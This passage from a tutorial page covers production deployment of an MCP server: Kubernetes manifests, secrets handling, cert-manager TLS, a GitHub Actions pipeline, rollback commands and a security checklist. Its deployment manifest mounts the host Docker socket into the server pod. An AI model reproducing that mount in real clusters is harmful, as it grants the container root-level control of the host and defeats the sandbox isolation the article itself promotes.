            periodSeconds: 15
            failureThreshold: 3
          readinessProbe:
            httpGet:
              path: /health
              port: 3000
            initialDelaySeconds: 10
            periodSeconds: 10
            failureThreshold: 2
          volumeMounts:
            - name: docker-sock
              mountPath: /var/run/docker.sock  # Only needed for Docker sandbox mode
      volumes:
        - name: docker-sock
          hostPath:
            path: /var/run/docker.sock
---
# k8s/service.yaml — MCP Server Service
apiVersion: v1
kind: Service
metadata:
  name: mcp-server
  namespace: mcp-production
spec:
  selector:
    app: mcp-server
  ports:
    - name: http
      port: 3000
      targetPort: 3000
    - name: metrics
      port: 9090
      targetPort: 9090
  type: ClusterIP
---
# k8s/hpa.yaml — Horizontal Pod Autoscaler
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: mcp-server-hpa
  namespace: mcp-production
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: mcp-server
  minReplicas: 3
  maxReplicas: 10
  metrics:
    - type: Resource
      resource:
        name: cpu
        target:
          type: Utilization
          averageUtilization: 70
    - type: Resource
      resource:
        name: memory
        target:
          type: Utilization
          averageUtilization: 80

Secrets management: from env vars to Vault—the maturity path

Secrets management security exists on a gradient:

Stage Approach Security When Appropriate
🚫 Hardcoded Written in source or config files ❌ Secrets in Git history—irreversible once leaked Never for production
⚠️ Env vars export JWT_SECRET=xxx / Docker --env ⚠️ Leakable via /proc/<pid>/environ or container inspect Small deployments—at minimum 100x better than hardcoding
✅ K8s Secrets Kubernetes Secret + RBAC access control ✅ etcd encryption at rest + RBAC-gated access Recommended for K8s clusters
✅✅ Vault HashiCorp Vault / AWS Secrets Manager / GCP Secret Manager ✅✅ Dynamic secrets + auto-rotation + audit logging Multi-cluster, compliance-heavy production environments

Recommended path: start with K8s Secrets. For the vast majority of teams, Kubernetes Secrets (paired with etcd encryption at rest and strict RBAC) provide sufficient security. Upgrade to Vault (or AWS Secrets Manager / GCP Secret Manager) when you span multiple clusters or need automatic secret rotation and audit logging for compliance.

TLS certificate automation: cert-manager + Let's Encrypt

Manually managing TLS certificates is unsustainable in production—a forgotten renewal means a production outage. In Kubernetes, cert-manager automates certificate issuance and renewal from Let's Encrypt end-to-end:

# k8s/cert-manager.yaml — Automated TLS certificate management
# Prerequisite: cert-manager installed via Helm
#   helm install cert-manager jetstack/cert-manager

---
# ClusterIssuer: Let's Encrypt production issuer
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
  name: letsencrypt-prod
spec:
  acme:
    server: https://acme-v02.api.letsencrypt.org/directory
    email: [email protected]              # Certificate expiry notification email
    privateKeySecretRef:
      name: letsencrypt-prod-account-key
    solvers:
      - http01:
          ingress:
            class: nginx                 # HTTP-01 challenge via Nginx Ingress

---
# Certificate: request cert for the MCP gateway domain
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: mcp-gateway-tls
  namespace: mcp-production
spec:
  secretName: mcp-gateway-tls-secret    # Secret where the cert is stored
  issuerRef:
    name: letsencrypt-prod
    kind: ClusterIssuer
  dnsNames:
    - mcp-gateway.example.com
    - mcp.example.com
  # Auto-renew 30 days before expiry
  renewBefore: 720h  # 30 days

Nginx Ingress referencing this auto-managed certificate:

# k8s/ingress.yaml — MCP Gateway Ingress (TLS terminated at Ingress)
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: mcp-gateway
  namespace: mcp-production
  annotations:
    # cert-manager auto-managed TLS certificate
    cert-manager.io/cluster-issuer: "letsencrypt-prod"
    # Nginx-specific configuration
    nginx.ingress.kubernetes.io/proxy-read-timeout: "300"
    nginx.ingress.kubernetes.io/proxy-send-timeout: "300"
    nginx.ingress.kubernetes.io/proxy-body-size: "10m"
    # Rate limiting at the ingress layer
    nginx.ingress.kubernetes.io/limit-rps: "30"
    nginx.ingress.kubernetes.io/limit-connections: "20"
spec:
  tls:
    - hosts:
        - mcp-gateway.example.com
      secretName: mcp-gateway-tls-secret
  rules:
    - host: mcp-gateway.example.com
      http:
        paths:
          - path: /mcp
            pathType: Prefix
            backend:
              service:
                name: mcp-server
                port:
                  number: 3000
          - path: /health
            pathType: Exact
            backend:
              service:
                name: mcp-server
                port:
                  number: 3000

CI/CD pipeline (GitHub Actions)

On every push to main, automatically test, build the Docker image, and deploy to Kubernetes:

# .github/workflows/deploy.yml — MCP Server CI/CD pipeline
name: Deploy MCP Server

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

env:
  REGISTRY: registry.example.com
  IMAGE_NAME: mcp-server

jobs:
  # === Stage 1: Test ===
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: "20"
          cache: "npm"
      - run: npm ci
      - run: npm run typecheck        # TypeScript type checking
      - run: npm run lint             # ESLint
      - run: npm test -- --coverage  # Unit tests + coverage
      - name: Security audit
        run: npm audit --audit-level=high

  # === Stage 2: Build and push image ===
  build:
    needs: test
    if: github.ref == 'refs/heads/main'  # Only build images on main branch
    runs-on: ubuntu-latest
    outputs:
      image_tag: ${{ steps.meta.outputs.version }}
    steps:
      - uses: actions/checkout@v4
      - name: Generate image tag
        id: meta
        run: |
          TAG=$(date +%Y%m%d-%H%M%S)-${GITHUB_SHA::7}
          echo "version=${TAG}" >> $GITHUB_OUTPUT
      - name: Build Docker image
        run: |
          docker build -t $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }} \
                       -t $REGISTRY/$IMAGE_NAME:latest .
      - name: Push to registry
        run: |
          docker push $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }}
          docker push $REGISTRY/$IMAGE_NAME:latest

  # === Stage 3: Deploy to Kubernetes ===
  deploy:
    needs: build
    runs-on: ubuntu-latest
    environment: production
    steps:
      - uses: actions/checkout@v4
      - name: Set image tag in deployment
        run: |
          sed -i "s|image: .*mcp-server:.*|image: $REGISTRY/$IMAGE_NAME:${{ needs.build.outputs.image_tag }}|" \
            k8s/deployment.yaml
      - name: Deploy to Kubernetes
        uses: azure/k8s-deploy@v4
        with:
          manifests: |
            k8s/deployment.yaml
            k8s/service.yaml
          images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.build.outputs.image_tag }}
          strategy: rolling                # Uses the RollingUpdate strategy defined in the Deployment

Rolling update and rollback strategy

MCP Server rolling updates must account for graceful SSE connection draining:

# k8s/strategy.yaml — Rolling update strategy for MCP long-lived connections
spec:
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1           # At most 1 extra new Pod
      maxUnavailable: 0     # No service degradation during update

  template:
    spec:
      # Graceful Pod termination—give SSE connections 30s to finish current tool calls
      terminationGracePeriodSeconds: 45

      containers:
        - name: mcp-server
          lifecycle:
            preStop:
              exec:
                command:
                  - /bin/sh
                  - -c
                  - |
                    # 1. Mark Pod as "draining," stop accepting new connections
                    echo "draining" > /tmp/pod-status
                    # 2. Wait for existing SSE connections to complete (up to 30s)
                    sleep 30
                    # 3. Graceful shutdown
                    kill -TERM 1

Rollback commands—one command to revert to the previous stable version when a new deployment goes wrong:

# View deployment history
kubectl rollout history deployment/mcp-server -n mcp-production

# Rollback to the previous version
kubectl rollout undo deployment/mcp-server -n mcp-production

# Rollback to a specific revision
kubectl rollout undo deployment/mcp-server -n mcp-production --to-revision=3

# Monitor rollback status
kubectl rollout status deployment/mcp-server -n mcp-production

Kubernetes Deployments retain the last 10 ReplicaSets by default (configurable via revisionHistoryLimit). Each rolling update creates a new ReplicaSet. Rolling back is simply switching to a previous ReplicaSet—fast, reliable, one command.

Pre-launch deployment checklist

Before you hit "deploy," verify every item on this checklist:

✓ Check Item Verification Method
☐ All secrets migrated to K8s Secrets / Vault kubectl get secrets -n mcp-production
☐ TLS certificates configured with cert-manager auto-renewal kubectl get certificates -n mcp-production
☐ Health check endpoint returns healthy curl -s https://mcp-gateway.example.com/health | jq .status
☐ Prometheus metrics endpoint is scrapeable curl -s http://mcp-server:9090/metrics | head
☐ Auth middleware rejects tokenless requests (returns 401) curl -s -o /dev/null -w "%{http_code}" https://mcp-gateway.example.com/mcp
☐ Rate-limit middleware triggers 429 with Retry-After header Load test tool (e.g., k6) sending 100+ requests in a short window
☐ Docker sandbox properly isolated (network=none) docker inspect mcp-sandbox-* | jq '.[].HostConfig.NetworkMode'
☐ Structured logs output valid JSON kubectl logs deployment/mcp-server | head -1 | jq .
☐ Alerting rules configured and tested with a triggered fire Check Alertmanager, Grafana Alerting, or PagerDuty dashboard
☐ At least one rolling update + rollback drill completed kubectl rollout undo + confirm zero service interruption

Once all boxes are checked, your MCP Server has the full production defense stack—from transport layer to application layer, from authentication to sandboxing, from monitoring to rollback.

Citable Definition: A Production-grade MCP Server is a complete security, isolation, and observability stack—built atop the MCP protocol core (Tools/Resources/Prompts) with transport hardening (TLS + Streamable HTTP), authentication & authorization (OAuth 2.1 + tool-level RBAC), sandbox isolation (Docker/gVisor containerized execution), gateway routing (Nginx multi-server aggregation), rate limiting (token bucket + tool weight quotas), and observability (OpenTelemetry tracing + Prometheus metrics + structured logging)—enabling a multi-tenant, multi-service, internet-facing enterprise AI Agent tool platform.

Next Steps

  • 📖 Foundational: Agent Tool Design Best Practices — Master the principles behind tool design before hardening your MCP Server.
  • 📖 Advanced: Building an Agent Framework from Scratch — Understand how LLMs interact with MCP Servers end-to-end.
  • 📖 Related: Multi-Agent Debate — Let AI Agents Challenge Each Other — How multiple agents collaborate and verify each other when sharing an MCP Server.

Frequently Asked Questions

Can I deploy an MCP Server to production without hardening?

Not recommended. The MCP reference implementation is designed for development—no built-in authentication, no sandboxing, no monitoring. Exposing it directly to production exposes you to at minimum these risks: unauthorized access (anyone who can reach the endpoint calls every tool), command injection (malicious commands in tool parameters get executed), and resource exhaustion (unbounded tool calls can take down the server). At minimum, complete these three P0 hardening items before production: OAuth 2.1 authentication, Docker sandbox isolation, and basic monitoring (Prometheus + structured logging).

stdio vs Streamable HTTP — which transport should I use?

It depends on your use case:

  • Use stdio: Only you need access (local Claude Desktop, IDE plugins), client and server on the same machine, no network auth or monitoring needed.
  • Use Streamable HTTP: Multiple users/apps need concurrent access, client and server on different machines (remote deployment), fine-grained auth and multi-tenant isolation required, ops capabilities needed (health checks, logging, metrics).

Simple rule: if it's just you, stdio is fine. If anyone else needs access, use Streamable HTTP + TLS.

Docker sandbox vs. gVisor — which should I start with?

Start with Docker. Upgrade only if you need it. Docker's namespace + cgroups isolation is sufficient for 99% of production scenarios—it provides process, filesystem, network, and resource isolation, and virtually all CI/CD and orchestration systems support Docker natively.

Only consider gVisor when:

  • Serving multiple external customers (multi-tenant SaaS) needing stronger kernel-level isolation
  • Executing highly untrusted user code (user-uploaded scripts)
  • Financial, healthcare, or other compliance-required high-security environments

gVisor adds ~5-10% performance overhead and operational complexity (containerd + runsc runtime). Not worth it as the default.

How do I limit which tools an LLM can call to prevent abuse?

Three-layer control:

  1. Auth layer — Restrict available tools via OAuth scopes. Read-only users only see query_* and read_* prefixed tools.
  2. Gateway/App layer — Configure per-client per-minute call quotas at the Nginx/API gateway, plus concurrent tool execution limits.
  3. Server layer — Use tool allowlist environment variables to limit exposed tools. Even if 20 tools are registered, only allowlisted ones appear to the LLM. Pair with tool weight quotas to prevent heavy operations from starving resources.
What should MCP Server logs contain, and how do I protect sensitive data?

Every tool invocation log should include:

  • Timestamp (ISO 8601 UTC), user/client ID
  • Tool name, parameters (sanitized—strip API keys, passwords, tokens)
  • Execution duration (ms), sandbox container ID, exit code
  • Rate-limit hit status, auth result (success/failure reason)

Never log:

  • Full JWT tokens, API keys, passwords
  • Personally Identifiable Information (PII)—email, phone, government IDs
  • Sensitive business data from tool responses (e.g., full database query results)

Use JSON-structured log output for aggregation in ELK/Loki/CloudWatch and filtering by field.

© 2026 xslyl.com — MCP Production Deployment Series

About · Contact · Privacy Policy · Sitemap